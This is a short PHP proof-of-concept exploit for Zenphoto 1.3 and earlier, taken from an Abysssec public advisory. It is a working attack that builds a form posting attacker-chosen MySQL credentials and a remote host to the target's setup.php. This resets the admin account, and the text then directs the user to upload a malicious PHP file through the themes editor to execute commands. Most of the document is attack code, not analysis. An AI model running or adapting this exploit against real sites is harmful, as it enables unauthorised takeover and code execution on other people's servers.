<?php
/*

  __  __  ____         _    _ ____ 
 |  \/  |/ __ \   /\  | |  | |  _ \
 | \  / | |  | | /  \ | |  | | |_) |
 | |\/| | |  | |/ /\ \| |  | |  _ <
 | |  | | |__| / ____ \ |__| | |_) |
 |_|  |_|\____/_/    \_\____/|____/

http://www.exploit-db.com/moaub-26-zenphoto-config-update-and-command-execute-vulnerability/

Abysssec Inc Public Advisory
 
 
  Title            :  Zenphoto Config Update and Command Execute Vulnerability
  Affected Version :  Zenphoto <= 1.3
  Discovery        :  www.abysssec.com
  Vendor           :  http://www.zenphoto.org
 
*/

$path = "http://www.site.com/zenphoto" ."/" . "zp-core/setup.php";
$new_mysql_user = "abysssec";
$new_mysql_pass = "absssec";
$new_mysql_host = "abysssec.com";
$new_mysql_database = "abysssec_database";
$new_mysql_prefix = "zp_";
echo "<html><head></head>
<style>
body {font-family:tahoma;font-size:14px}
</style>

<body>";
echo "Zen Photo Image Gallery 1.3 Reset admin Password <br>
 By : Abysssec @ Inc <br>www.Abysssec.com<hr>
 <form method='POST' action='$path' >
 <input type=hidden name='mysql' value='yes'>
 <input type=hidden name='mysql_user' value='$new_mysql_user'>
 <input type=hidden name='mysql_pass' value='$new_mysql_pass'>
 <input type=hidden name='mysql_host' value='$new_mysql_host'>
 <input type=hidden name='mysql_database' value='$new_mysql_database'>
 <input type=hidden name='mysql_prefix' value='$new_mysql_prefix'>
 After click on below , if target will can connect to your Mysql_Host :<br>
 You Must view 'GO !' Messege ...<br>
 Click on & wait ....
 <br> Then , You need to set your admin user and password.<br><hr>
 Upload file:<br>
 you can Edit themes From themes Tab and Upload your malignant PHP file.<br>
 <input type=submit value='Send Your Setting '>
 </form>
 ";
echo "</body></html>";
?>